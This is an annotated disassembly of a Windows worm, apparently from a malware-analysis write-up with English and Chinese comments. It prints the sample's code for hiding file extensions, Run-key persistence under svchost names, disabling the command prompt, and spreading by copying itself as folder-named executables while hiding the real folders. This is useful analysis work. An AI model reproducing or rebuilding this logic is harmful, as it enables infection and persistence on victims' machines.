00401C78|.C745 E0 B8E24>mov dword ptr , 0042E2B8 ;ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt" -> [ebp-20]
00401C7F|.8BF4 mov esi, esp
00401C81|.8D45 E8 lea eax, dword ptr ; [ebp-18] receives the key handle
00401C84|.50 push eax ; /pHandle
00401C85|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C8A|.6A 00 push 0 ; |Reserved = 0
00401C8C|.8B4D E0 mov ecx, dword ptr ; |
00401C8F|.51 push ecx ; |Subkey
00401C90|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C95|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C9B|.3BF4 cmp esi, esp
00401C9D|.E8 1E1F0000 call 00403BC0
00401CA2|.8BF4 mov esi, esp
00401CA4|.6A 04 push 4 ; /BufSize = 4
00401CA6|.8D55 E4 lea edx, dword ptr ; | [ebp-1C] == 1
00401CA9|.52 push edx ; |Buffer
00401CAA|.6A 04 push 4 ; |ValueType = REG_DWORD
00401CAC|.6A 00 push 0 ; |Reserved = 0
00401CAE|.68 A4E24200 push 0042E2A4 ; |ValueName = "UnCheckedValue"
00401CB3|.8B45 E8 mov eax, dword ptr ; |
00401CB6|.50 push eax ; |hKey
00401CB7|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA: ...\Folder\HideFileExt\UnCheckedValue = 1, so un-ticking "Hide extensions for known file types" still hides them — keeps "Folder.exe" looking like "Folder"
00401CBD|.3BF4 cmp esi, esp
00401CBF|.E8 FC1E0000 call 00403BC0
00401CC4|.8BF4 mov esi, esp
00401CC6|.8B4D E8 mov ecx, dword ptr
00401CC9|.51 push ecx ; /hKey
00401CCA|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401CD0|.3BF4 cmp esi, esp
00401CD2|.E8 E91E0000 call 00403BC0
00401CD7|.B9 05000000 mov ecx, 5 ; copy 5*4 + 2 + 1 = 23 bytes (22 chars + NUL) ...
00401CDC|.BE 88E24200 mov esi, 0042E288 ;ASCII "C:\windows\svchost.exe"
00401CE1|.8DBD D8FEFFFF lea edi, dword ptr ; ... into a 260-byte local at [ebp-128]
00401CE7|.F3:A5 rep movs dword ptr es:, dword p>
00401CE9|.66:A5 movs word ptr es:, word ptr [esi>
00401CEB|.A4 movs byte ptr es:, byte ptr [esi>
00401CEC|.B9 3B000000 mov ecx, 3B ; zero the remaining 0x3B*4 + 1 = 237 bytes (23 + 237 == 260)
00401CF1|.33C0 xor eax, eax
00401CF3|.8DBD EFFEFFFF lea edi, dword ptr ; [ebp-111]
00401CF9|.F3:AB rep stos dword ptr es:
00401CFB|.AA stos byte ptr es:
00401CFC|.B9 07000000 mov ecx, 7 ; copy 7*4 + 2 = 30 bytes (29 chars + NUL) ...
00401D01|.BE 64E24200 mov esi, 0042E264 ;ASCII "C:\windows\system\svchost.exe"
00401D06|.8DBD D4FDFFFF lea edi, dword ptr ; ... into a 260-byte local at [ebp-22C]
00401D0C|.F3:A5 rep movs dword ptr es:, dword p>
00401D0E|.66:A5 movs word ptr es:, word ptr [esi>
00401D10|.B9 39000000 mov ecx, 39 ; zero the remaining 0x39*4 + 2 = 230 bytes
00401D15|.33C0 xor eax, eax
00401D17|.8DBD F2FDFFFF lea edi, dword ptr ; [ebp-20E]
00401D1D|.F3:AB rep stos dword ptr es:
00401D1F|.66:AB stos word ptr es:
00401D21|.C785 D0FDFFFF>mov dword ptr , 0042E22C ;ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -> [ebp-230]
00401D2B|.8BF4 mov esi, esp
00401D2D|.8D55 DC lea edx, dword ptr ; [ebp-24] receives the key handle
00401D30|.52 push edx ; /pHandle
00401D31|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401D36|.6A 00 push 0 ; |Reserved = 0
00401D38|.8B85 D0FDFFFF mov eax, dword ptr ; |
00401D3E|.50 push eax ; |Subkey
00401D3F|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401D44|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA(HKLM\...\Run) — persistence
00401D4A|.3BF4 cmp esi, esp
00401D4C|.E8 6F1E0000 call 00403BC0
00401D51|.8D8D D8FEFFFF lea ecx, dword ptr ; [ebp-128]
00401D57|.51 push ecx
00401D58|.E8 E31D0000 call 00403B40 ; eax = length of "C:\windows\svchost.exe" (strlen-like — confirm); used as cbData without the terminating NUL
00401D5D|.83C4 04 add esp, 4
00401D60|.8BF4 mov esi, esp
00401D62|.50 push eax ; /BufSize
00401D63|.8D95 D8FEFFFF lea edx, dword ptr ; |
00401D69|.52 push edx ; |Buffer
00401D6A|.6A 01 push 1 ; |ValueType = REG_SZ
00401D6C|.6A 00 push 0 ; |Reserved = 0
00401D6E|.68 1CE24200 push 0042E21C ; |ValueName = "svchost1.exe"
00401D73|.8B45 DC mov eax, dword ptr ; |
00401D76|.50 push eax ; |hKey
00401D77|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA: Run value "svchost1.exe" = "C:\windows\svchost.exe" (auto-start of the self-copy)
00401D7D|.3BF4 cmp esi, esp
00401D7F|.E8 3C1E0000 call 00403BC0
00401D84|.8D8D D4FDFFFF lea ecx, dword ptr ; [ebp-22C]
00401D8A|.51 push ecx
00401D8B|.E8 B01D0000 call 00403B40
00401D90|.83C4 04 add esp, 4
00401D93|.8BF4 mov esi, esp
00401D95|.50 push eax ; /BufSize
00401D96|.8D95 D4FDFFFF lea edx, dword ptr ; |
00401D9C|.52 push edx ; |Buffer
00401D9D|.6A 01 push 1 ; |ValueType = REG_SZ
00401D9F|.6A 00 push 0 ; |Reserved = 0
00401DA1|.68 0CE24200 push 0042E20C ; |ValueName = "svchost2.exe"
00401DA6|.8B45 DC mov eax, dword ptr ; |
00401DA9|.50 push eax ; |hKey
00401DAA|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA: Run value "svchost2.exe" = "C:\windows\system\svchost.exe" (auto-start of the Recycle.exe copy)
00401DB0|.3BF4 cmp esi, esp
00401DB2|.E8 091E0000 call 00403BC0
00401DB7|.8BF4 mov esi, esp
00401DB9|.8B4D DC mov ecx, dword ptr
00401DBC|.51 push ecx ; /hKey
00401DBD|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401DC3|.3BF4 cmp esi, esp
00401DC5|.E8 F61D0000 call 00403BC0
00401DCA|.C785 C8FDFFFF>mov dword ptr , 2 ; [ebp-238] = 2 (DWORD written below)
00401DD4|.C785 C4FDFFFF>mov dword ptr , 0042E1D8 ;ASCII "Software\Policies\Microsoft\Windows\System" -> [ebp-23C]
00401DDE|.8BF4 mov esi, esp
00401DE0|.6A 00 push 0 ; /pDisposition = NULL
00401DE2|.8D95 CCFDFFFF lea edx, dword ptr ; | [ebp-234] receives the key handle
00401DE8|.52 push edx ; |pHandle
00401DE9|.6A 00 push 0 ; |pSecurity = NULL
00401DEB|.68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
00401DF0|.6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE
00401DF2|.68 CCE14200 push 0042E1CC ; |Class = "REG_DWORD" (used as the key's class string — a misuse of the lpClass argument, harmless)
00401DF7|.6A 00 push 0 ; |Reserved = 0
00401DF9|.8B85 C4FDFFFF mov eax, dword ptr ; |
00401DFF|.50 push eax ; |Subkey
00401E00|.68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00401E05|.FF15 6C834300 call dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyExA: creates the per-user policy key (no admin rights needed for HKCU)
00401E0B|.3BF4 cmp esi, esp
00401E0D|.E8 AE1D0000 call 00403BC0
00401E12|.8BF4 mov esi, esp
00401E14|.6A 04 push 4 ; /BufSize = 4
00401E16|.8D8D C8FDFFFF lea ecx, dword ptr ; | [ebp-238] == 2
00401E1C|.51 push ecx ; |Buffer
00401E1D|.6A 04 push 4 ; |ValueType = REG_DWORD
00401E1F|.6A 00 push 0 ; |Reserved = 0
00401E21|.68 BCE14200 push 0042E1BC ; |ValueName = "DisableCMD"
00401E26|.8B95 CCFDFFFF mov edx, dword ptr ; |
00401E2C|.52 push edx ; |hKey
00401E2D|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA: HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD = 2 — the "Prevent access to the command prompt" policy (value 2 is the variant that still lets batch scripts run — confirm); blocks the user from cmd.exe-based clean-up
00401E33|.3BF4 cmp esi, esp
00401E35|.E8 861D0000 call 00403BC0
00401E3A|.8BF4 mov esi, esp
00401E3C|.8B85 CCFDFFFF mov eax, dword ptr
00401E42|.50 push eax ; /hKey
00401E43|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401E49|.3BF4 cmp esi, esp
00401E4B|.E8 701D0000 call 00403BC0
00401E50|.5F pop edi ; epilogue; no meaningful return value is set
00401E51|.5E pop esi
00401E52|.5B pop ebx
00401E53|.81C4 7C020000 add esp, 27C
00401E59|.3BEC cmp ebp, esp
00401E5B|.E8 601D0000 call 00403BC0 ; final frame check
00401E60|.8BE5 mov esp, ebp
00401E62|.5D pop ebp
00401E63\.C3 retn
6.获取驱动器类型并遍历磁盘：在所有文件夹里添加 Desktop.ini，在一级目录下创建同名的"文件夹.exe"，并将原文件夹设为系统隐藏属性
; --- 004026A0: excerpt (cut after the first API call). Takes one argument, a root path string ([ebp+8]), and queries its drive type ---
004026A0/> \55 push ebp
004026A1|.8BEC mov ebp, esp
004026A3|.83EC 40 sub esp, 40 ; 0x40 bytes of locals
004026A6|.53 push ebx
004026A7|.56 push esi
004026A8|.57 push edi
004026A9|.8D7D C0 lea edi, dword ptr ; [ebp-40]
004026AC|.B9 10000000 mov ecx, 10
004026B1|.B8 CCCCCCCC mov eax, CCCCCCCC
004026B6|.F3:AB rep stos dword ptr es: ; 0xCC debug-build stack fill
004026B8|.8BF4 mov esi, esp
004026BA|.8B45 08 mov eax, dword ptr ; [ebp+8] = first argument (root path)
004026BD|.50 push eax ; /RootPathName
004026BE|.FF15 D4834300 call dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA(root): drive type in eax; how the result is used (which drive types are infected) is not in this excerpt
; --- 004027A0: excerpt. Drops a hidden+system Desktop.ini into the directory passed as the first argument ([ebp+8]).
; The written file makes Explorer draw that folder with the icon stored in Recycle.exe (IconFile=Recycle.exe, IconIndex=0);
; a Desktop.ini with this content in many folders is a file-system IoC for this sample. The CreateFileA handle is not
; closed within this excerpt (the routine is cut at 00402865). Stack offsets recovered from the opcode bytes. ---
004027A0/> \55 push ebp
004027A1|.8BEC mov ebp, esp
004027A3|.81EC 84010000 sub esp, 184 ; 0x184 bytes of locals
004027A9|.53 push ebx
004027AA|.56 push esi
004027AB|.57 push edi
004027AC|.8DBD 7CFEFFFF lea edi, dword ptr ; [ebp-184]
004027B2|.B9 61000000 mov ecx, 61
004027B7|.B8 CCCCCCCC mov eax, CCCCCCCC
004027BC|.F3:AB rep stos dword ptr es: ; 0xCC debug-build stack fill
004027BE|.8BF4 mov esi, esp
004027C0|.8B45 08 mov eax, dword ptr ; [ebp+8] = directory path argument
004027C3|.50 push eax ; /<%s>
004027C4|.68 34E54200 push 0042E534 ; |Format = "%s\Desktop.ini"
004027C9|.8D8D FCFEFFFF lea ecx, dword ptr ; | [ebp-104]
004027CF|.51 push ecx ; |s
004027D0|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA: "<dir>\Desktop.ini" -> [ebp-104]
004027D6|.83C4 0C add esp, 0C
004027D9|.3BF4 cmp esi, esp
004027DB|.E8 E0130000 call 00403BC0
004027E0|.B9 0C000000 mov ecx, 0C ; copy 12*4 + 2 + 1 = 51 bytes (50 chars + NUL) ...
004027E5|.BE F4E44200 mov esi, 0042E4F4 ; "[.ShellClassInfo]",LF,"IconFile=Recycle.exe",LF,"IconIndex=0"
004027EA|.8DBD C0FEFFFF lea edi, dword ptr ; ... into the local at [ebp-140]
004027F0|.F3:A5 rep movs dword ptr es:, dword p>
004027F2|.66:A5 movs word ptr es:, word ptr [esi>
004027F4|.A4 movs byte ptr es:, byte ptr [esi>
004027F5|.C785 F8FEFFFF>mov dword ptr , 33 ; [ebp-108] = 0x33 = 51 = sizeof(the string incl. NUL)
004027FF|.8BF4 mov esi, esp
00402801|.6A 00 push 0 ; /hTemplateFile = NULL
00402803|.6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00402805|.6A 02 push 2 ; |Mode = CREATE_ALWAYS
00402807|.6A 00 push 0 ; |pSecurity = NULL
00402809|.6A 00 push 0 ; |ShareMode = 0
0040280B|.68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00402810|.8D95 FCFEFFFF lea edx, dword ptr ; | [ebp-104]
00402816|.52 push edx ; |FileName
00402817|.FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA: creates/overwrites "<dir>\Desktop.ini" for the directory passed in (the original note's fixed "c:\windows\Desktop.ini" is just one caller's argument)
0040281D|.3BF4 cmp esi, esp
0040281F|.E8 9C130000 call 00403BC0
00402824|.8985 BCFEFFFF mov dword ptr , eax ; [ebp-144] = hFile (INVALID_HANDLE_VALUE is not checked)
0040282A|.8BF4 mov esi, esp
0040282C|.6A 00 push 0 ; /pOverlapped = NULL
0040282E|.8D85 F4FEFFFF lea eax, dword ptr ; | [ebp-10C]
00402834|.50 push eax ; |pBytesWritten
00402835|.8B8D F8FEFFFF mov ecx, dword ptr ; | 0x33
0040283B|.83E9 01 sub ecx, 1 ; | 0x33-1 = 50: the text without its NUL
0040283E|.51 push ecx ; |nBytesToWrite
0040283F|.8D95 C0FEFFFF lea edx, dword ptr ; | [ebp-140]
00402845|.52 push edx ; |Buffer
00402846|.8B85 BCFEFFFF mov eax, dword ptr ; |
0040284C|.50 push eax ; |hFile
0040284D|.FF15 D8834300 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile: writes the three-line Desktop.ini body below
; [.ShellClassInfo]
; IconFile=Recycle.exe
; IconIndex=0
00402853|.3BF4 cmp esi, esp
00402855|.E8 66130000 call 00403BC0
0040285A|.8BF4 mov esi, esp
0040285C|.6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040285E|.8D8D FCFEFFFF lea ecx, dword ptr ; | [ebp-104]
00402864|.51 push ecx ; |FileName
00402865|.FF15 C4834300 call dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA: marks Desktop.ini hidden+system so it stays invisible even with "Show hidden files" (and the SHOWALL tampering above keeps that option broken)
00401F10/> \55 push ebp
00401F11|.8BEC mov ebp, esp
00401F13|.81EC A80C0000 sub esp, 0CA8
00401F19|.53 push ebx
00401F1A|.56 push esi
00401F1B|.57 push edi
00401F1C|.8DBD 58F3FFFF lea edi, dword ptr
00401F22|.B9 2A030000 mov ecx, 32A
00401F27|.B8 CCCCCCCC mov eax, CCCCCCCC
00401F2C|.F3:AB rep stos dword ptr es:
00401F2E|.8BF4 mov esi, esp
00401F30|.8D85 FCFEFFFF lea eax, dword ptr
00401F36|.50 push eax ; /Buffer
00401F37|.68 04010000 push 104 ; |BufSize = 104 (260.)
00401F3C|.FF15 D0834300 call dword ptr [<&KERNEL32.GetLogical>; \获取逻辑驱动器
00401F42|.3BF4 cmp esi, esp
00401F44|.E8 771C0000 call 00403BC0
00401F49|.8985 F4F9FFFF mov dword ptr , eax
00401F4F|.8BF4 mov esi, esp
00401F51|.8B8D F4F9FFFF mov ecx, dword ptr
00401F57|.51 push ecx ; /<%d>
00401F58|.68 D4E44200 push 0042E4D4 ; |Format = "%d"
00401F5D|.8D95 F8F9FFFF lea edx, dword ptr ; |
00401F63|.52 push edx ; |s
00401F64|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00401F6A|.83C4 0C add esp, 0C
00401F6D|.3BF4 cmp esi, esp
00401F6F|.E8 4C1C0000 call 00403BC0
00401F74|.C785 F0F9FFFF>mov dword ptr , 0
00401F7E|.EB 0F jmp short 00401F8F
00401F80|>8B85 F0F9FFFF /mov eax, dword ptr
00401F86|.83C0 04 |add eax, 4
00401F89|.8985 F0F9FFFF |mov dword ptr , eax
00401F8F|>8B8D F0F9FFFFmov ecx, dword ptr
00401F95|.3B8D F4F9FFFF |cmp ecx, dword ptr
00401F9B|.0F84 5C050000 |je 004024FD
00401FA1|.8B95 F0F9FFFF |mov edx, dword ptr
00401FA7|.0FBE8415 FEFE>|movsx eax, byte ptr
00401FAF|.8BF4 |mov esi, esp
00401FB1|.50 |push eax ; /<%c>
00401FB2|.8B8D F0F9FFFF |mov ecx, dword ptr ; |
00401FB8|.0FBE940D FDFE>|movsx edx, byte ptr ; |
00401FC0|.52 |push edx ; |<%c>
00401FC1|.8B85 F0F9FFFF |mov eax, dword ptr ; |
00401FC7|.0FBE8C05 FCFE>|movsx ecx, byte ptr ; |
00401FCF|.51 |push ecx ; |<%c>
00401FD0|.68 CCE44200 |push 0042E4CC ; |Format = "%c%c%c"
00401FD5|.8D95 F8FDFFFF |lea edx, dword ptr ; |
00401FDB|.52 |push edx ; |s
00401FDC|.FF15 14864300 |call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401FE2|.83C4 14 |add esp, 14
00401FE5|.3BF4 |cmp esi, esp
00401FE7|.E8 D41B0000 |call 00403BC0
00401FEC|.68 C8E44200 |push 0042E4C8 ;ASCII "*.*"
00401FF1|.8D85 F8FDFFFF |lea eax, dword ptr
00401FF7|.50 |push eax
00401FF8|.E8 931C0000 |call 00403C90
00401FFD|.83C4 08 |add esp, 8
00402000|.8BF4 |mov esi, esp
00402002|.8D8D B0F8FFFF |lea ecx, dword ptr
00402008|.51 |push ecx ; /pFindFileData
00402009|.8D95 F8FDFFFF |lea edx, dword ptr ; |
0040200F|.52 |push edx ; |FileName
00402010|.FF15 CC834300 |call dword ptr [<&KERNEL32.FindFirst>; \搜索所有文件夹
00402016|.3BF4 |cmp esi, esp
00402018|.E8 A31B0000 |call 00403BC0
0040201D|.8985 ACF8FFFF |mov dword ptr , eax
00402023|.83BD ACF8FFFF>|cmp dword ptr , -1
0040202A|.75 05 |jnz short 00402031
0040202C|.^ E9 4FFFFFFF |jmp 00401F80
00402031|>C685 FBFDFFFF>|mov byte ptr , 0
00402038|>8BF4 |/mov esi, esp
0040203A|.8D85 B0F8FFFF ||lea eax, dword ptr
00402040|.50 ||push eax ; /pFindFileData
00402041|.8B8D ACF8FFFF ||mov ecx, dword ptr ; |
00402047|.51 ||push ecx ; |hFile
00402048|.FF15 C8834300 ||call dword ptr [<&KERNEL32.FindNext>; \还是搜文件
0040204E|.3BF4 ||cmp esi, esp
00402050|.E8 6B1B0000 ||call 00403BC0
00402055|.85C0 ||test eax, eax
00402057|.0F84 85040000 ||je 004024E2
0040205D|.8B95 B0F8FFFF ||mov edx, dword ptr
00402063|.83E2 10 ||and edx, 10
00402066|.85D2 ||test edx, edx
00402068|.0F84 A3030000 ||je 00402411
0040206E|.8D85 DCF8FFFF ||lea eax, dword ptr
00402074|.50 ||push eax
00402075|.E8 C61A0000 ||call 00403B40
0040207A|.83C4 04 ||add esp, 4
0040207D|.83F8 64 ||cmp eax, 64
00402080|.0F87 17020000 ||ja 0040229D
00402086|.8BF4 ||mov esi, esp
00402088|.8D8D DCF8FFFF ||lea ecx, dword ptr
0040208E|.51 ||push ecx ; /<%s>
0040208F|.8D95 F8FDFFFF ||lea edx, dword ptr ; |
00402095|.52 ||push edx ; |<%s>
00402096|.68 44E44200 ||push 0042E444 ; |Format = "%s%s AI_Boy.exe"
0040209B|.8D85 A8F7FFFF ||lea eax, dword ptr ; |
004020A1|.50 ||push eax ; |s
004020A2|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004020A8|.83C4 10 ||add esp, 10
004020AB|.3BF4 ||cmp esi, esp
004020AD|.E8 0E1B0000 ||call 00403BC0
004020B2|.8BF4 ||mov esi, esp
004020B4|.8D8D DCF8FFFF ||lea ecx, dword ptr
004020BA|.51 ||push ecx ; /<%s>
004020BB|.8D95 F8FDFFFF ||lea edx, dword ptr ; |
004020C1|.52 ||push edx ; |<%s>
004020C2|.68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004020C7|.8D85 A4F6FFFF ||lea eax, dword ptr ; |
004020CD|.50 ||push eax ; |s
004020CE|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004020D4|.83C4 10 ||add esp, 10
004020D7|.3BF4 ||cmp esi, esp
004020D9|.E8 E21A0000 ||call 00403BC0
004020DE|.8D8D A4F6FFFF ||lea ecx, dword ptr
004020E4|.51 ||push ecx
004020E5|.E8 1BEFFFFF ||call 00401005
004020EA|.83C4 04 ||add esp, 4
004020ED|.8BF4 ||mov esi, esp
004020EF|.8D95 A4F6FFFF ||lea edx, dword ptr
004020F5|.52 ||push edx ; /<%s>
004020F6|.68 F0E04200 ||push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
004020FB|.8D85 9CF4FFFF ||lea eax, dword ptr ; |
00402101|.50 ||push eax ; |s
00402102|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402108|.83C4 0C ||add esp, 0C
0040210B|.3BF4 ||cmp esi, esp
0040210D|.E8 AE1A0000 ||call 00403BC0
00402112|.8D8D 9CF4FFFF ||lea ecx, dword ptr
00402118|.51 ||push ecx
00402119|.8D95 A4F6FFFF ||lea edx, dword ptr
0040211F|.52 ||push edx
00402120|.E8 0B1B0000 ||call 00403C30
00402125|.83C4 08 ||add esp, 8
00402128|.8BF4 ||mov esi, esp
0040212A|.FF15 E0834300 ||call dword ptr [<&KERNEL32.GetLastE>; [GetLastError
00402130|.3BF4 ||cmp esi, esp
00402132|.E8 891A0000 ||call 00403BC0
00402137|.85C0 ||test eax, eax
00402139|.0F85 AF000000 ||jnz 004021EE
0040213F|.8BF4 ||mov esi, esp
00402141|.8D85 9CF4FFFF ||lea eax, dword ptr
00402147|.50 ||push eax ; /<%s>
00402148|.68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
0040214D|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
00402153|.51 ||push ecx ; |s
00402154|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
0040215A|.83C4 0C ||add esp, 0C
0040215D|.3BF4 ||cmp esi, esp
0040215F|.E8 5C1A0000 ||call 00403BC0
00402164|.8BF4 ||mov esi, esp
00402166|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402168|.8D95 A8F7FFFF ||lea edx, dword ptr ; |
0040216E|.52 ||push edx ; |NewFileName
0040216F|.68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402174|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \复制文件创建文件夹同名.exe
0040217A|.3BF4 ||cmp esi, esp
0040217C|.E8 3F1A0000 ||call 00403BC0
00402181|.8BF4 ||mov esi, esp
00402183|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402185|.8D85 A0F5FFFF ||lea eax, dword ptr ; |
0040218B|.50 ||push eax ; |NewFileName
0040218C|.68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402191|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402197|.3BF4 ||cmp esi, esp
00402199|.E8 221A0000 ||call 00403BC0
0040219E|.8BF4 ||mov esi, esp
004021A0|.68 80000000 ||push 80 ; /FileAttributes = NORMAL
004021A5|.8D8D A8F7FFFF ||lea ecx, dword ptr ; |
004021AB|.51 ||push ecx ; |FileName
004021AC|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004021B2|.3BF4 ||cmp esi, esp
004021B4|.E8 071A0000 ||call 00403BC0
004021B9|.8BF4 ||mov esi, esp
004021BB|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021BD|.8D95 9CF4FFFF ||lea edx, dword ptr ; |
004021C3|.52 ||push edx ; |FileName
004021C4|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \设置文件为隐藏、系统属性
004021CA|.3BF4 ||cmp esi, esp
004021CC|.E8 EF190000 ||call 00403BC0
004021D1|.8BF4 ||mov esi, esp
004021D3|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021D5|.8D85 A0F5FFFF ||lea eax, dword ptr ; |
004021DB|.50 ||push eax ; |FileName
004021DC|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004021E2|.3BF4 ||cmp esi, esp
004021E4|.E8 D7190000 ||call 00403BC0
004021E9|.E9 AA000000 ||jmp 00402298
004021EE|>8BF4 ||mov esi, esp
004021F0|.8D8D 9CF4FFFF ||lea ecx, dword ptr
004021F6|.51 ||push ecx ; /<%s>
004021F7|.68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
004021FC|.8D95 A0F5FFFF ||lea edx, dword ptr ; |
00402202|.52 ||push edx ; |s
00402203|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402209|.83C4 0C ||add esp, 0C
0040220C|.3BF4 ||cmp esi, esp
0040220E|.E8 AD190000 ||call 00403BC0
00402213|.8BF4 ||mov esi, esp
00402215|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402217|.8D85 A8F7FFFF ||lea eax, dword ptr ; |
0040221D|.50 ||push eax ; |NewFileName
0040221E|.68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402223|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402229|.3BF4 ||cmp esi, esp
0040222B|.E8 90190000 ||call 00403BC0
00402230|.8BF4 ||mov esi, esp
00402232|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402234|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
0040223A|.51 ||push ecx ; |NewFileName
0040223B|.68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402240|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402246|.3BF4 ||cmp esi, esp
00402248|.E8 73190000 ||call 00403BC0
0040224D|.8BF4 ||mov esi, esp
0040224F|.68 80000000 ||push 80 ; /FileAttributes = NORMAL
00402254|.8D95 A8F7FFFF ||lea edx, dword ptr ; |
0040225A|.52 ||push edx ; |FileName
0040225B|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402261|.3BF4 ||cmp esi, esp
00402263|.E8 58190000 ||call 00403BC0
00402268|.8BF4 ||mov esi, esp
0040226A|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040226C|.8D85 A4F6FFFF ||lea eax, dword ptr ; |
00402272|.50 ||push eax ; |FileName
00402273|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402279|.3BF4 ||cmp esi, esp
0040227B|.E8 40190000 ||call 00403BC0
00402280|.8BF4 ||mov esi, esp
00402282|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
00402284|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
0040228A|.51 ||push ecx ; |FileName
0040228B|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402291|.3BF4 ||cmp esi, esp
00402293|.E8 28190000 ||call 00403BC0
00402298|>E9 6F010000 ||jmp 0040240C
0040229D|>8BF4 ||mov esi, esp
0040229F|.8D95 DCF8FFFF ||lea edx, dword ptr
004022A5|.52 ||push edx ; /<%s>
004022A6|.8D85 F8FDFFFF ||lea eax, dword ptr ; |
004022AC|.50 ||push eax ; |<%s>
004022AD|.68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004022B2|.8D8D A8F7FFFF ||lea ecx, dword ptr ; |
004022B8|.51 ||push ecx ; |s
004022B9|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004022BF|.83C4 10 ||add esp, 10
004022C2|.3BF4 ||cmp esi, esp
004022C4|.E8 F7180000 ||call 00403BC0
004022C9|.8BF4 ||mov esi, esp
004022CB|.8D95 A8F7FFFF ||lea edx, dword ptr
004022D1|.52 ||push edx ; /<%s>
004022D2|.68 20E44200 ||push 0042E420 ; |Format = "%s.\"
004022D7|.8D85 98F3FFFF ||lea eax, dword ptr ; |
004022DD|.50 ||push eax ; |s
004022DE|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004022E4|.83C4 0C ||add esp, 0C
004022E7|.3BF4 ||cmp esi, esp
004022E9|.E8 D2180000 ||call 00403BC0
004022EE|.8D8D 98F3FFFF ||lea ecx, dword ptr
004022F4|.51 ||push ecx
004022F5|.E8 0BEDFFFF ||call 00401005
004022FA|.83C4 04 ||add esp, 4
004022FD|.8D95 A8F7FFFF ||lea edx, dword ptr
00402303|.52 ||push edx
00402304|.E8 37180000 ||call 00403B40
00402309|.83C4 04 ||add esp, 4
